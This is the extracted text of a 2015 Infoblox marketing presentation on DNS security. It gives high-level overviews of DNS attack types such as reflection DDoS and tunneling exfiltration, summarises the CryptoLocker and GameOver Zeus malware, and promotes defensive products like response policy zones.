Domain Name System (DNS) Network Security Asset or Achilles Heel? Seema Kathuria, Sr. Product Marketing Manager, Infoblox February 19, 2015 Agenda • What is DNS and How Does It Work? • Threat Landscape Trends • Common Attack Vectors - Anatomy of an attack: DNS Hijacking Anatomy of an attack: Reflection Attack Anatomy of an attack: Data Exfiltration via DNS Tunneling • How to Protect Yourself? • Q&A 3 © 2015 Infoblox Inc. All Rights Reserved. What is the Domain Name System (DNS)? • Address book for The Internet • Translates “google.com” to 220.127.116.11 • Invented in 1983 by Paul Mokapetris (UC Irvine) Without DNS,DNS The Internet Communications Outage&=Network Business Downtime Would Stop 4 © 2015 Infoblox Inc. All Rights Reserved. How Does DNS Work? WWW.GOOGLE.COM “That’s in my cache, it maps to: 18.104.22.168 “Great, now I know how to get to www.google.com” ROOT DNS SERVER 22.214.171.124 “Great, I’ll put that in my cache in case I get another request” “That domain is not in my server, I will ask another DNS Server” 126.96.36.199 “I need directions to www.google.com” 5 © 2015 Infoblox Inc. All Rights Reserved. ISP DNS SERVER For Bad Guys, DNS Is a Great Target DNS is the cornerstone of the Internet used by every business and government DNS as a protocol is easy to exploit Traditional protection is ineffective against evolving threats DNS Outage = Business Downtime 6 © 2015 Infoblox Inc. All Rights Reserved. Defense-in-Depth and DNS Security Gap • Firewalls and IDS/IPS devices don’t effectively address DNS security threats • Proliferation of BYOD devices, mobile users means threats may be inside the firewall • DNS technology is ideal for defending against threats and disrupting APT/malware communications from infected devices • Traditional security products generally don’t focus on DNS • DNS security layer needed to fill gap 7 © 2015 Infoblox Inc. All Rights Reserved. The DNS Security Challenges 1 Securing the DNS platform 2 Defending against DNS attacks including data exfiltration via DNS tunneling 3 Preventing malware from using DNS to communicate to malicious domains 8 © 2015 Infoblox Inc. All Rights Reserved. DNS Attack Vectors 9 © 2015 Infoblox Inc. All Rights Reserved. Anatomy of an Attack Syrian Electronic Army 10 © 2015 Infoblox Inc. All Rights Reserved. Anatomy of an Attack Distributed Reflection DoS Attack (DrDoS) How the attack works Combines reflection and amplification Internet Uses third-party open resolvers in the Internet (unwitting accomplice) Attacker sends spoofed queries to the open recursive servers Uses queries specially crafted to result in a very large response Attacker Causes DDoS on the victim’s server Target Victim 11 © 2015 Infoblox Inc. All Rights Reserved. Anatomy of an Attack Data Exfiltration via DNS Tunneling 1. File containing sensitive info converted to text, broken into chunks and exfiltrated via DNS 2. Exfiltrated data put back together and decrypted to get the valuable information 3. Used spoofed addresses 12 © 2015 Infoblox Inc. All Rights Reserved. The Rising Tide of DNS Threats Are You Prepared? TCP/UDP/ICMP floods: DNS amplification: Flood victim’s network with large amounts of traffic DNS cache poisoning: Protocol anomalies: Corruption of a DNS cache database with a rogue address Malformed DNS packets causing server to crash DNS tunneling: Tunneling of another protocol through DNS for data ex-filtration DNS based exploits: Exploit vulnerabilities in DNS software 13 Use amplification in DNS reply to flood victim Top DNS attacks DNS hijacking: Subverting resolution of DNS queries to point to rogue DNS server Reconnaissance: Probe to get information on network environment before launching attack DNS reflection/DrDos: Fragmentation: Use third party DNS servers to propagate DDoS attack Traffic with lots of small out of order fragments Phantom Domain: NXDOMAIN: Force DNS server to resolve multiple non-existent domains and wait for responses Flood DNS server with requests for non-existent domains © 2015 Infoblox Inc. All Rights Reserved. APT/Malware Examples CryptoLocker “Ransomware” and GameOver Zeus CryptoLocker: • Targets Windows-based computers • Appears as attachment within seemingly legitimate email • Upon infection, encrypts files: local hard drive and mapped network drives • Ransom: 72 hours to pay $300USD • If not paid, encryption key deleted and data irretrievable • Only way to stop (after executable has started) is by blocking outbound connection to encryption server GameOver Zeus: • 500,000 to 1M infections worldwide • Hundreds of millions of dollars stolen • Highly sophisticated and hard to track • Uses P2P communication to control infected devices or botnet • Upon infection, it monitors machine for finance-related information • Takes control of private online transactions and diverts funds to criminal accounts • Responsible for distribution of CryptoLocker, and infected systems can be used for DDoS attacks 14 © 2015 Infoblox Inc. All Rights Reserved. Security Breaches using APTs/Malware 2014 Q1 15 © 2015 Infoblox Inc. All Rights Reserved. Q2 Q3 Q4 Protection Best Practices 16 © 2015 Infoblox Inc. All Rights Reserved. Help Is On The Way! DNSSEC Dedicated Appliances Collaboration RPZ Monitoring Advanced DNS Protection 17 © 2015 Infoblox Inc. All Rights Reserved. Get the Teams Talking – Questions to Ask: • • Who in your organization is responsible for DNS Security? What methods, procedures, tools do you have in place to detect and mitigate DNS attacks? Would you know if an attack was happening? Would you know how to stop it? • IT OPS Team IT Apps Team © 2015 Infoblox Inc. All Rights Reserved. Security Team Network Team 18 Hardened DNS Appliances Conventional Server Approach Hardened Appliance Approach Update Service Secure Access Multiple Open Ports Limited Port Access Dedicated hardware with no unnecessary logical or physical ports – Many open ports are subject to attack – Users have OS-level account privileges on server – Requires time-consuming manual updates No OS-level user accounts—only admin accts Immediate updates to new security threats Secure HTTPS-based access to device management No SSH or root-shell access Encrypted device-to-device communication 19 © 2015 Infoblox Inc. All Rights Reserved. Legitimate Traffic Advanced DNS Protection Automatic updates Advanced DNS Protection (External DNS) Data for Reports Updated ThreatIntelligence Server Advanced DNS Protection (Internal DNS) Reporting Server Reports on attack types, severity 20 © 2015 Infoblox Inc. All Rights Reserved. Response Policy Zones - RPZ Blocking Responses from Malicious Domains 1 An infected device brought into the office. Malware spreads to other devices on network. 2 Malware makes a DNS query to find “home” (botnet / C&C). DNS Server looks at the DNS response and blocks the connection to the malicious domain. 4 Malicious domains Reputational Feed: IPs, Domains, etc. of Bad Servers 2 Malware / APT Internet Intranet DNS Server with RPZ capability Blocked communication attempt sent to Syslog 3 1 3 2 4 Malware / APT spreads within network; Calls home 21 © 2015 Infoblox Inc. All Rights Reserved. Query to malicious domain logged; security teams can now identify requesting endpoint and attempt remediation RPZ regularly updated with malicious domain data using available reputational feeds Take the DNS Security Risk Assessment 1. Analyzes your organization’s DNS setup to assess level of risk of exposure to DNS threats 2. Provides DNS Security Risk Score and analysis based on answers given 3. www.infoblox.com/dnssecurityscore Higher score = higher DNS security risk!! 22 © 2015 Infoblox Inc. All Rights Reserved. Try DNS Firewall Virtual Evaluation Use DNS to Find Malware/APT Lurking in Your Network Two options: Port Span and Standalone No hardware (100% virtual) Non-disruptive to production network 60-day trial See Malware/APT activity with reports www.infoblox.com/catchmalware 23 © 2015 Infoblox Inc. All Rights Reserved. Call to Action • DNS security vulnerabilities pose a significant threat • Raise the awareness of DNS and DNS security vulnerabilities in your organization • There are many resources available to help • Seek help if needed to protect DNS • Talk to Infoblox 24 © 2015 Infoblox Inc. All Rights Reserved. Infoblox Overview Founded in 1999 Headquartered in Santa Clara, CA with global operations in 25 countries Total Revenue (Fiscal Year Ending July 31) $300.0 Leader in technology for network control $250.0 $200.0 • DDI market leader (Gartner) • 50% DDI market share (IDC) 7,000+ customers 74,000+ systems shipped to 100 countries $MM Market leadership $150.0 $100.0 $50.0 $0.0 FY2009 45 patents, 27 pending IPO April 2012: NYSE BLOX 25 © 2015 Infoblox Inc. All Rights Reserved. FY2010 FY2011 FY2012 FY2013 FY2014 IT Analyst Validation Gartner: “usage of a commercial DDI solution can reduce (network) OPEX by 50% or more.” IDC: Infoblox is the only major DDI vendor to gain market share over the past three years. Gartner: “Infoblox is the DDI market leader in terms of mainstream brand awareness.” 26 © 2015 Infoblox Inc. All Rights Reserved. Worldwide DDI Market Share – 2013 27 © 2015 Infoblox Inc. All Rights Reserved.